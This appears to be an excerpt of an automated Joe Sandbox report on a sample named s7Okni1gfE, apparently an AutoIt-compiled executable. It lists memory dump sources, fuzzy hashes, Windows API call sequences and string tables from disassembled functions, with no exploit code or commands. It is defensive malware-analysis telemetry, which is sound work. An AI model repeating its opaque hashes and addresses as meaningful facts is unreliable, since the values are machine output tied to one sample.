                                            • Instruction Fuzzy Hash: 9B22A070904219CFDB64DF58C880AAAB7F1FF18314F14C86AD99ADB391E735A981CB91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ea563145f585c28b2309eb0b446fcc59ff2b1222f335e598abc6eb83a99a9ad8
                                            • Instruction ID: 4ce4fb273997287214f0c90d5cfebb2927f2d243a5eb73299d5256bacd04bcb0
                                            • Opcode Fuzzy Hash: ea563145f585c28b2309eb0b446fcc59ff2b1222f335e598abc6eb83a99a9ad8
                                            • Instruction Fuzzy Hash: A912BE70A002099FDF44DFA8DD81AEEB7F5FF48300F108529E856E7295EB36A920CB55
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Exception@8Throwstd::exception::exception
                                            • String ID:
                                            • API String ID: 3728558374-0
                                            • Opcode ID: 7b2bda881ea2ddca1316e34146df5d6a46157ae7274defb50c6e21d9efdad067
                                            • Instruction ID: a0aea26ee655440a7714cc1be48d548f198550106a08afbc5354025ce68dc050
                                            • Opcode Fuzzy Hash: 7b2bda881ea2ddca1316e34146df5d6a46157ae7274defb50c6e21d9efdad067
                                            • Instruction Fuzzy Hash: 0102C170A00209DFCF54DF68D991AAEBBB5FF44310F10C069E80ADB295EB35DA51CB96
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                            • Instruction ID: fa7261eeb96298c440e3fbf9e4eccd0555634d253891a65a6be2a8072424afe8
                                            • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                            • Instruction Fuzzy Hash: 48C1C5322051A30ADF2D4639943447EBAA1EEA17B571A076DD8B2CF5D3FF20D5A4DA20
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                            • Instruction ID: 734493f2e9f0e62817ba29e374cf6aa26f56780e2b94d5f0578588022bf6a27b
                                            • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                            • Instruction Fuzzy Hash: DAC1B4322051A30ADF2D4639943447EBAA1EEA27B171A076DD4B3CF5D7FF20D5A4DA20
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                            • Instruction ID: 958bc207d47ee93de976bc3f2cdc5dd48b508548a3f0c267f1bc1766d699b37e
                                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                            • Instruction Fuzzy Hash: 4AC1C1322090A309DF2D4639D4304BEBAA5AEA27B571A077DD5B2CF4D7FF20D5A4D620
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1483155707.00000000011B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_11b0000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                            • Instruction ID: 69023e60983705d0a7e71569d814da61c1e41a73afff856dc419f64dfc387c08
                                            • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                            • Instruction Fuzzy Hash: 4841D371D1051CEBDF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1483155707.00000000011B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_11b0000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                            • Instruction ID: 2d20d1d7fc9d9ec71d5363c4e7cc85eff495ebc2cac86be8e3b39b85ce1c7fa2
                                            • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                            • Instruction Fuzzy Hash: 40019278A11109EFCB48DF98C5909AEF7B5FB48310F208599E819A7701D731AE51DB80
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1483155707.00000000011B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_11b0000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                            • Instruction ID: c6b2e56d88f59a9c9d3a0c416231c64c42cb8d40f085379b1adc4a10a7e1b61c
                                            • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                            • Instruction Fuzzy Hash: D7019278A15109EFCB48DF98C5909AEF7B5FB48310F208599E819A7701D730AE51DB81
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1483155707.00000000011B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_11b0000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                            • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                            • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                            • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                            APIs
                                            • DeleteObject.GDI32(00000000), ref: 0085A2FE
                                            • DeleteObject.GDI32(00000000), ref: 0085A310
                                            • DestroyWindow.USER32 ref: 0085A31E
                                            • GetDesktopWindow.USER32 ref: 0085A338
                                            • GetWindowRect.USER32(00000000), ref: 0085A33F
                                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0085A480
                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0085A490
                                            • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0085A4D8
                                            • GetClientRect.USER32(00000000,?), ref: 0085A4E4
                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0085A51E
                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0085A540
                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0085A553
                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0085A55E
                                            • GlobalLock.KERNEL32(00000000), ref: 0085A567
                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0085A576
                                            • GlobalUnlock.KERNEL32(00000000), ref: 0085A57F
                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0085A586
                                            • GlobalFree.KERNEL32(00000000), ref: 0085A591
                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0085A5A3
                                            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0088D9BC,00000000), ref: 0085A5B9
                                            • GlobalFree.KERNEL32(00000000), ref: 0085A5C9
                                            • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0085A5EF
                                            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0085A60E
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0085A630
                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0085A81D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                            • String ID: $AutoIt v3$DISPLAY$static
                                            • API String ID: 2211948467-2373415609
                                            • Opcode ID: 81554e2ed7a7446623494d52985d419d484658071f7a520b6ac6f90740945ca4
                                            • Instruction ID: 718bc8410cad5766c9001beae47b2cb466a78078fc52696ebfd796ec91375ba4
                                            • Opcode Fuzzy Hash: 81554e2ed7a7446623494d52985d419d484658071f7a520b6ac6f90740945ca4
                                            • Instruction Fuzzy Hash: D4026D75900218AFDB14DFA8CD89EAE7BB9FF49311F008258F915EB2A1D770AD41CB61
                                            APIs
                                            • SetTextColor.GDI32(?,00000000), ref: 0086D2DB
                                            • GetSysColorBrush.USER32(0000000F), ref: 0086D30C
                                            • GetSysColor.USER32(0000000F), ref: 0086D318
                                            • SetBkColor.GDI32(?,000000FF), ref: 0086D332
                                            • SelectObject.GDI32(?,00000000), ref: 0086D341
                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0086D36C
                                            • GetSysColor.USER32(00000010), ref: 0086D374
                                            • CreateSolidBrush.GDI32(00000000), ref: 0086D37B
                                            • FrameRect.USER32(?,?,00000000), ref: 0086D38A
                                            • DeleteObject.GDI32(00000000), ref: 0086D391
                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0086D3DC
                                            • FillRect.USER32(?,?,00000000), ref: 0086D40E
                                            • GetWindowLongW.USER32(?,000000F0), ref: 0086D439
                                              • Part of subcall function 0086D575: GetSysColor.USER32(00000012), ref: 0086D5AE
                                              • Part of subcall function 0086D575: SetTextColor.GDI32(?,?), ref: 0086D5B2
                                              • Part of subcall function 0086D575: GetSysColorBrush.USER32(0000000F), ref: 0086D5C8
                                              • Part of subcall function 0086D575: GetSysColor.USER32(0000000F), ref: 0086D5D3
                                              • Part of subcall function 0086D575: GetSysColor.USER32(00000011), ref: 0086D5F0
                                              • Part of subcall function 0086D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0086D5FE
                                              • Part of subcall function 0086D575: SelectObject.GDI32(?,00000000), ref: 0086D60F
                                              • Part of subcall function 0086D575: SetBkColor.GDI32(?,00000000), ref: 0086D618
                                              • Part of subcall function 0086D575: SelectObject.GDI32(?,?), ref: 0086D625
                                              • Part of subcall function 0086D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0086D644
                                              • Part of subcall function 0086D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0086D65B
                                              • Part of subcall function 0086D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0086D670
                                              • Part of subcall function 0086D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0086D698
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                            • String ID:
                                            • API String ID: 3521893082-0
                                            • Opcode ID: 3a1934c23d1c441ac4b75577b48af3ab0a8da98f593b0faeb5ac7f1d36617381
                                            • Instruction ID: 611e100b2c9fe51b39d0b6070a75140274e0952a0c3fbc0072bd4a2198c0f315
                                            • Opcode Fuzzy Hash: 3a1934c23d1c441ac4b75577b48af3ab0a8da98f593b0faeb5ac7f1d36617381
                                            • Instruction Fuzzy Hash: D9918C72508305EFCB10AF68DC48E6BBBA9FF89325F100A19F962D61E0D731D944CB92
                                            APIs
                                            • DestroyWindow.USER32 ref: 0081B98B
                                            • DeleteObject.GDI32(00000000), ref: 0081B9CD
                                            • DeleteObject.GDI32(00000000), ref: 0081B9D8
                                            • DestroyIcon.USER32(00000000), ref: 0081B9E3
                                            • DestroyWindow.USER32(00000000), ref: 0081B9EE
                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 0087D2AA
                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0087D2E3
                                            • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0087D711
                                              • Part of subcall function 0081B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0081B759,?,00000000,?,?,?,?,0081B72B,00000000,?), ref: 0081BA58
                                            • SendMessageW.USER32 ref: 0087D758
                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0087D76F
                                            • ImageList_Destroy.COMCTL32(00000000), ref: 0087D785
                                            • ImageList_Destroy.COMCTL32(00000000), ref: 0087D790
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                            • String ID: 0
                                            • API String ID: 464785882-4108050209
                                            • Opcode ID: b07b9e9661bc914b44157fed6a77ea1b235cff5f82fed4248e0d064faba4444a
                                            • Instruction ID: f3ea5ea517a6d05a1f7cc10eb5349f0752512d681aac88e6333582e27afba89a
                                            • Opcode Fuzzy Hash: b07b9e9661bc914b44157fed6a77ea1b235cff5f82fed4248e0d064faba4444a
                                            • Instruction Fuzzy Hash: FA127C70204305DFDB25CF28C884BA9BBF5FF55304F148569E989CB666D731E882CB92
                                            APIs
                                            • SetErrorMode.KERNEL32(00000001), ref: 0084DBD6
                                            • GetDriveTypeW.KERNEL32(?,0089DC54,?,\\.\,0089DC00), ref: 0084DCC3
                                            • SetErrorMode.KERNEL32(00000000,0089DC54,?,\\.\,0089DC00), ref: 0084DE29
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ErrorMode$DriveType
                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                            • API String ID: 2907320926-4222207086
                                            • Opcode ID: c3228de4793d7dac10cd66ba95f7e1e3dd6c182b36a3e3eb5d2e377fc2808918
                                            • Instruction ID: 3d6164766c173de2b88987a326a17a71f2800fab177da6b8ac5bf0e68a5b8d4a
                                            • Opcode Fuzzy Hash: c3228de4793d7dac10cd66ba95f7e1e3dd6c182b36a3e3eb5d2e377fc2808918
                                            • Instruction Fuzzy Hash: AE519E3064830EEBC610EF14CC92A69B7A0FB94718B10591EF467D73D5DB74E945DB42
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __wcsnicmp
                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                            • API String ID: 1038674560-86951937
                                            • Opcode ID: 4c9bae77d7fa74ebc84a89be3e1544a11405cdc0978805507053d9473dd72147
                                            • Instruction ID: 88760d0cf3f6830e6bb9396ebf1af36423dab675dfcf02b3279000baedfeb823
                                            • Opcode Fuzzy Hash: 4c9bae77d7fa74ebc84a89be3e1544a11405cdc0978805507053d9473dd72147
                                            • Instruction Fuzzy Hash: 1B81E771640219BBDF64BF68DC92FAE3768FF24304F144138F909E61C6EB64DA41C6A6
                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0086C788
                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0086C83E
                                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 0086C859
                                            • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0086CB15
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window
                                            • String ID: 0
                                            • API String ID: 2326795674-4108050209
                                            • Opcode ID: 1a58fa8ce9cf1ee3792b77877eb493e35b8654e8afeb12135e9096b83be4fa99
                                            • Instruction ID: 7fb7954c15ccaa7bcb77af8309c6a7f7377d29173c715f5156a6ba2683f7d68a
                                            • Opcode Fuzzy Hash: 1a58fa8ce9cf1ee3792b77877eb493e35b8654e8afeb12135e9096b83be4fa99
                                            • Instruction Fuzzy Hash: D7F1EFB1204305AFE7218F28C889BBABBE4FF49354F09062DF5D8D62A1D774D944DB92
                                            APIs
                                            • CharUpperBuffW.USER32(?,?,0089DC00), ref: 00866449
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: BuffCharUpper
                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                            • API String ID: 3964851224-45149045
                                            • Opcode ID: e97580d74c37c3b6289880f0d254bbb6e620dacc1cddee88a27a99cd8a459e93
                                            • Instruction ID: f0732c611a05f1c8f098f9ac0bc7eabee886e499c797582f47a5f13dd6600f26
                                            • Opcode Fuzzy Hash: e97580d74c37c3b6289880f0d254bbb6e620dacc1cddee88a27a99cd8a459e93
                                            • Instruction Fuzzy Hash: A3C175302042868BCA04EF58C5519AE7795FF94344F054969F986D7393EF20ED5ACB86
                                            APIs
                                            • GetSysColor.USER32(00000012), ref: 0086D5AE
                                            • SetTextColor.GDI32(?,?), ref: 0086D5B2
                                            • GetSysColorBrush.USER32(0000000F), ref: 0086D5C8
                                            • GetSysColor.USER32(0000000F), ref: 0086D5D3
                                            • CreateSolidBrush.GDI32(?), ref: 0086D5D8
                                            • GetSysColor.USER32(00000011), ref: 0086D5F0
                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0086D5FE
                                            • SelectObject.GDI32(?,00000000), ref: 0086D60F
                                            • SetBkColor.GDI32(?,00000000), ref: 0086D618
                                            • SelectObject.GDI32(?,?), ref: 0086D625
                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0086D644
                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0086D65B
                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0086D670
                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0086D698
                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0086D6BF
                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 0086D6DD
                                            • DrawFocusRect.USER32(?,?), ref: 0086D6E8
                                            • GetSysColor.USER32(00000011), ref: 0086D6F6
                                            • SetTextColor.GDI32(?,00000000), ref: 0086D6FE
                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0086D712
                                            • SelectObject.GDI32(?,0086D2A5), ref: 0086D729
                                            • DeleteObject.GDI32(?), ref: 0086D734
                                            • SelectObject.GDI32(?,?), ref: 0086D73A
                                            • DeleteObject.GDI32(?), ref: 0086D73F
                                            • SetTextColor.GDI32(?,?), ref: 0086D745
                                            • SetBkColor.GDI32(?,?), ref: 0086D74F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                            • String ID:
                                            • API String ID: 1996641542-0
                                            • Opcode ID: 1ae7ca9a6d7dd30fb66aaacd490d93f0b6e6b1a67467f949ededab35697781c8
